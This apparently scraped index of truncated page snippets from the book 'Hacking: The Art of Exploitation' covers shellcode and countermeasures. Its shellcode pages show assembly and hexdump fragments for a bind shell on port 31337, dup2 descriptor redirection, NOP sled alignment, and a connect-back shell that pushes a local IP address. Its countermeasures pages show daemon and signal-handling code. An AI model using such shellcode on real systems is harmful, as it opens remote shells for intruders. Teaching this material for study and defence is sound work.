Hacking - The Art of Exploitation, 2nd Edition
Shellcode 307 push BYTE 16 ; argv: { sizeof(server struct) = 16, push ecx ; server struct pointer, push esi ; socket file descri ...
308 0x500 int dup(int oldfd); int dup2(int oldfd, int newfd); DESCRIPTION dup() and dup2() create a copy of the file descriptor ...
Shellcode 309 00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |..fCRRV......j?X| 00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 ...
310 0x500 0x0804839f <main+43>: lea eax,[ebp-4] 0x080483a2 <main+46>: inc DWORD PTR [eax] 0x080483a4 <main+48> ...
Shellcode 311 This loop iterates ECX from 0 to 2 , making a call to dup2 each time. With a more complete understanding of the fl ...
312 0x500 The first two instructions before the loop can be shortened with the xchg (exchange) instruction. This instruction swa ...
Shellcode 313 push edx ; Build sockaddr struct: INADDR_ANY = 0 push WORD 0x697a ; (in reverse order) PORT = 31337 push WORD bx ; ...
314 0x500 reader@hacking:~/booksrc $ nasm bind_shell.s reader@hacking:~/booksrc $ hexdump -C bind_shell 00000000 6a 66 58 99 31 ...
Shellcode 315 pop eax inc ebx ; ebx = 2 (needed for AF_INET) push DWORD 0x482aa8c0 ; Build sockaddr struct: IP address = 192.168 ...
316 0x500 Since these values are stored in network byte order but the x86 architecture is in little-endian order, the stored D ...
Shellcode 317 the return address uses multiple bytes. To ensure proper alignment, the sum of the NOP sled and shellcode bytes mu ...
318 0x500 multiple instructions. One way to do this is to write the two null bytes to the stack using a zeroed register. The fil ...
0x600 COUNTERMEASURES The golden poison dart frog secretes an extremely toxic poison—one frog can emit enough to kill 10 adult h ...
320 0x600 minor outbreak early instead of years later when it can cause real damage. If it weren’t for Internet worms making a p ...
Countermeasures 321 0x620 System Daemons To have a realistic discussion of exploit countermeasures and bypass methods, we first ...
322 0x600 System daemons run detached from a controlling terminal, so the new tinyweb daemon code writes to a log file. Without ...
Countermeasures 323 printf("Caught signal %d\t", signal); if (signal == SIGTSTP) printf("SIGTSTP (Ctrl-Z)"); else if (signal == ...
324 0x600 reader@hacking:~/booksrc $ kill -l 1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKI ...
Countermeasures 325 tinywebd.c #include <sys/stat.h> #include <sys/socket.h> #include <netinet/in.h> #include < ...
326 0x600 write(logfd, "Starting up.\n", 15); host_addr.sin_family = AF_INET; // Host byte order host_addr.sin_port = htons(PORT ...